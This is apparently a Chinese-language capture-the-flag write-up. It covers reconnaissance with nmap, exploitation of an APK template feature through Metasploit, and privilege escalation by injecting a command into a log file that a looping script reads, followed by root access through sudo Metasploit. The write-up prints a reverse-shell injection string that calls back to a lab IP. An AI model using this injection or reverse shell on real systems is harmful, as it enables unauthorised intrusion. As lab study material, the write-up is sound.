信息收集
nmap
5000端口如下。
测试nmap。
测试exploit。
测试sploits。
尝试绕过,开启与否的url编码前后一致。
目前没有发现有利用的地方,继续回到payloads继续测试。
现在payloads有三个可能存在漏洞的地方。
- windows template file
- linux template file
- apk template file
分别使用搜索引擎。
比较在意其中APK的一个相关搜索结果。
msf也找到得到对应的。
看了一下会
随便换了个payload。
这个负载会生成一个apk文件,并且在payloads进行写入的时候,反手注入写入者一波。但是失败了。
又换了一个payload。
顺利利用。
开机
提权
有一个.sudo_as_admin_successful文件,但是是空的,它为什么会出现在这里。
sudo -l需要kid的密码,但是目前没有。
在.ssh文件里面找到了authorized_keys,此文件内一般会有用户密码,但是现在这个文件是空的,并且可以修改,所以可以选择修改文件使用ssh登录。
来到了pwn用户目录。
有一个脚本,同样能够修改和执行,功能是什么呢。简单地说就是读取/home/kid/logs/hackers文件内容,并且经过一些处理后使用nmap扫描。
然后此应用是以pwn身份运行,可以在脚本后面加上一句反弹,就能收到pwn身份的shell了,注意这个脚本会一直循环读取hackers文件。
看来直接添加到scanlosers.sh文件是不行的所以来仔细看看这个脚本干了什么。
先给log赋一个文件的路径。切换到pwn用户根目录。
然后以' '为分隔符,留下第2个' '以后的所有字符,又以ascii码排序并去重,最后读取前面一系列操作后的结果作为ip变量的值。
再看看后面的代码,判断这个hackers文件行数是否大于0,是的话就给hackers文件一个不自动换行的参数-n,简单来说就是就是让hackers文件为空。
不出意外这样输入就能获得pwn的shell,但是我写不进去。
权限上又能写,什么情况呢。
写入前面的authorized_keys文件看看,这个文件能写入但是hackers为什么不能写入呢。
因为前面提到过authorized_keys文件会一直不停读取hackers文件,如果输入后行数大于0就会被执行脚本后立即清空。所以直接写进去应该就能读取了。
现在来构造一下语句,要通过cut和sort,就需要这样构造shell,;从左到右无论成功与否都会执行。
127.0.0.1 12;bash -c "bash -i >& /dev/tcp/10.10.14.22/1234 0>&1"
但是会报错重定向。
会不会是这后面导致重定向错误,反弹语句后面跟上注释符#试试。
127.0.0.1 12;bash -c "bash -i >& /dev/tcp/10.10.14.22/1234 0>&1" #
切换到pwn用户后,发现能用sudo运行msf。
可以看到使用sudo登陆的msf拥有root的权限。
正在sudo权限下的msf中反弹即可,也可以直接在msf中建了一个shell,使用bash应该就可以了。
883
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
